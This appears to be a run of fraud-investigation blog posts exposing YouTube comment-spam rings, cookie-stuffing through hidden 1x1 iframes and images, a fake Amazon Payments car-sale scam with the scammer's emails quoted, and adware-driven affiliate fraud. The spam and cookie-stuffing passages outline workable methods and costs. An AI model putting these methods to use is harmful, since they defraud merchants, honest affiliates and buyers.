  • A set of accounts (B) to thumbs up the comments posted by set A. This is how the spammers get to the top of the comment’s section. For each comment posted by A, a group of approvers from B will come along and give it a thumbs up which will quickly push it to the top. Naturally the size of B must be greater than the size of A. You can buy 100 regular (non PVA) YouTube accounts for $5

buy youtube  accounts

  • The tricky part is writing a tool that will monitor the front page of YouTube and post comments (with approval from set B) on each of the videos that have not yet been targeted. Not too difficult if you have Compsci 101 behind you (or even just a few weeks fiddling with Python/Java/.Net…). You won’t have to write it yourself though, because there are plenty of bots that already do this for you (with captcha support!). Expect to spend anywhere from $50 to $150.

The costs above are not where it ends. If you refresh a video with tainted comments for a while, you will notice that the tainted comment does eventually disappear (feedback from the community marks it as bad). Of course, sit a little while longer and the tainted comment will return. So as much as the YouTube abuse team is fighting the spammers back, the spammers are constantly increasing the size of set A and B.

“It’s all out war out there! What’s an abuse team to do?”

This is not a trivial problem to solve. What surprised me the most from analyzing YouTube spam comments, is that the same comment after being taken down will quickly make its way back to the top. I’d make a bet that there’s low hanging fruit to be had here by combining user feedback on tainted comments with a unique hash on the comment itself. In doing so one could block the comment at the front door.

“Yeah right, the spammers will then simply diversify each comment enough to avoid whatever filter is put in place”

Sure. The trick here is then to get to the root of the problem and really put a dent in their armour: identify outbound CPL links.

If you are a Linkshare affiliate competing for the same traffic as today’s rogue affiliate, know that you do not stand a chance. The reason for this is because Linkshare affiliate ‘smaqEgQUEvQ’ is unfairly using Cookie-Stuffing techniques to maximize his affiliate revenue.

Let’s look at how the scam is put together.

When visiting this page on, casual inspection yields nothing out of the ordinary.

affiliate fraud

Open up the HTML source behind this page and scroll to line 279, note the hidden iframe (with a 1×1 height/width and CSS display set to none) pointing to a Linkshare affiliate click link:

 WIDTH=1 HEIGHT=1 FRAMEBORDER=1  style="display:none">

This is HTML that will invisibly load the affiliate click link and in turn the merchant that it  routes through to (resulting in applicable cookies pushed onto the user’s machine), in this case it is . I dynamically modified the page to show the page that was hidden, follow the red arrow below



As is unfortunately the case with Cookie-Stuffing, the merchant will pay an unearned commission to the rogue affiliate should the user make a purchase within a predefined amount of time. So the merchant will lose and honest affiliates lose as well (for their cookies may have been overwritten).

Can’t reproduce this for yourself? This packet trace confirms the behavior in question.

I give this fraudster a 1/10.

  • 1 point for basic Cookie-Stuffing


Upon casual inspection, reviews antivirus solutions for your PC. In their own words:

We recommend you the best antivirus software for your PC. Our reviews and recommendations are balanced from the performance, budget and easy to use. Below are the Top 3 Antivirus programs that will give you the best performance and are Worth The Value You Pay For!

affiliate fraud

There’s a little more to this site than meets the eye. When you visit each of the pages for the products reviewed, is invisibly forcing affiliate cookies associated with the product in question onto your machine. The idea is that if you end up buying one of these products further down the road, then Bestpcantivirus will be paid a commission for they claim themselves as the entity responsible for the purchase. This is fine if you clicked through on the appropriate affiliate click links, but that’s not what happens here, i.e., Bestpcantivirus is playing the game unfairly. If you are an affiliate competing for the same traffic then you are going to lose.

Line 43 in the HTML source of this bestpcantivirus page has an IMG tag with a src attribute set to a link which will redirect through to an affiliate click link (CJ affiliate id 5727502) and then onto Norton.


Bestpcantivirus knows what they are doing is wrong, so they set the width and height attributes of this malformed image to 1×1, this way you won’t see it if you are just browsing casually. affiliate fraudI dynamically modified the DOM to alter the dimensions of this image to 50×50, the red arrow highlights what is really going on:

affiliate fraud

As always, if you can’t reproduce this for yourself, this packet trace confirms the activity.

I give this scammer a 2/10:

  • 1 point for the most basic form of Cookie-Stuffing
  • 1 point for Cookie-Stuffing multiple merchants:
    Merchant CJ Affiliate Id
    AVG 5727502
    Eset 3840211
    F-Secure 3840211
    Kaspersky 5727502
    Pandasecurity 5727502
    Zonealarm 3840211

Recall that the Bargain Hunter scam is a four pronged attack:

1. Scammer Sets the Trap

This ad has a 2002 Toyota Tacoma PreRunner up for grabs at $5,582. scam through amazon payments

It’s a pretty good deal, designed to whet my appetite and have me get in touch with the seller thinking that there’s a great deal here, i.e., it’s an entry point to a Bargain Hunter scam.

2. Victim Takes the Bait

First response from the seller:

From: Jessica Hale (
Subject: used car lead for Juanna - 2002 Toyota Tacoma‏

I still have my  2002 Toyota Tacoma Double Cab SR-5 TRD Pre-runner 
with 3.4 V-6, automatic transmission.Used 128k miles ,VIN# 
5tegn92n72z012744 .

I will take only $5500 total price shipping included from Medford OR,
i have my own trailer to have the truck delivered to you.It has a 
clear title ready to be signed and notarized on your name.

Runs great,no problems at all,garage kept only.  I can offer a 7 days 

More pics attached here:

The Photobucket link shows pictures of the car that are not available in the original ad (so this must be legit, right?)

3. Scammer Gains Victim’s Trust

It stands to reason that nobody in their right mind would engage in a financial transaction involving a large sum of money, someone they have never met and a car they have never seen. More so when the first act of good faith must come from the buyer, i.e., send the money first and then you will receive the goods.

Ah, but what about an entity that I trust? I do transactions of this nature every day with Amazon right? So of course I will send money to them and then wait for delivery, if not for any other reason than they always deliver no matter what. Doesn’t take much to see how scammers will exploit this.

Email correspondence eventually received from the scammer when asking about how the transaction will take place:

From: Jessica Hale (
Subject: used car lead for Juanna - 2002 Toyota Tacoma‏

I have a contract with Amazon Payments so we can go through 
their Protection Program.

According with  the Amazon you have 7 days after you receive 
the car to inspect it and decide if you want to BUY IT or NOT.

Here is how it will work:

 1.First of all I will need  the following details from you:
 - Full Name
 - Full Address

 2. After I will receive the details from you, I will forward 
 them to Amazon.

 3. After they will process your info, they will send us both 
 invoices. You will receive the invoice with the details on 
 how to make a refundable payment to Amazon.They will hold 
 your payment while you test and inspect the vehicle at your
 home for a week.

 4. Amazon will contact me to ship the car to you. After you 
 receive the car you will have 7 days to test, verify and do 
 whatever you need to the car.  If you will decide to buy the 
 car, then I will get  the money from Amazon.

 5. If you will decide that you do not buy the car,  Amazon 
 will refund your payment same day.

I look forward to hearing from you . 

Thank you

Upon accepting these terms, I quickly got an email from someone claiming to be Amazon and amazon payment fraudThe Amazon email actually comes from a Live account: Amazon FPS (

4. Victim Sends Money

Once I send the money through Money Gram then it’s gone. I won’t hear from the seller again and the car will never arrive. I could get in touch with Amazon but they won’t know what I’m talking about (obviously because they were never involved)

I give this scammer 1/10:

- 1 point for a very basic Bargain Hunter scam

As is usually the case, the scammer could have done a lot more here to improve the scam. He didn’t screen calls, he didn’t sample responses and he did not go the extra mile when I asked for additional photos of the rear view mirror (saying that his kids broke his camera). Like most of the drivel out there, he is a bottom of the barrel scammer.

So sad to think that sooner or later the scammer behind this ad is going to catch another victim, he wouldn’t be doing this otherwise.

Co-authored with Ben Edelman

On a computer running Perion Incredibar adware, our crawler browses the site.  Incredibar sees this traffic and invisibly invokes the CJ click link with publisher ID 7164280, which redirects back to Cafepress.

Because the toolbar drops CJ cookies invisibly, there is nothing for us to show in a screenshot.  But the network trace confirms what occurred and confirms that the affiliate link was invoked invisibly.  Specifically, notice the creation of an invisible IFRAME called tbm_stat (CSS style of display:none, hence invisible).  Loaded inside that IFRAME is which creates another invisible IFRAME called tbmi_stat, again CSS display:none.  Within this doubly-invisible IFRAME, the redirect flow sends traffic onwards to the CJ click link — confirming that the cookie-drop occurs completely invisibly.

If a user subsequently makes a purchase, CJ and Cafepress records will credit affiliate 7164280 with purportedly causing that purchase.  But in fact the user was already at the Cafepress site before the Incredibar adware and this affiliate 7164280 intervened.  They did nothing to cause or encourage the user’s purchase, and any payments to this affiliate are entirely wasted.

Meanwhile, Incredibar’s advertising fraud is also notable in that Incredibar made by Perion, a publicly-traded company (NASDAQ: PERI).  We see no obvious mechanism whereby Perion could diffuse blame or responsibility to any third party.  Investors would no doubt be surprised to learn that Perion’s revenue sources include affiliate fraud.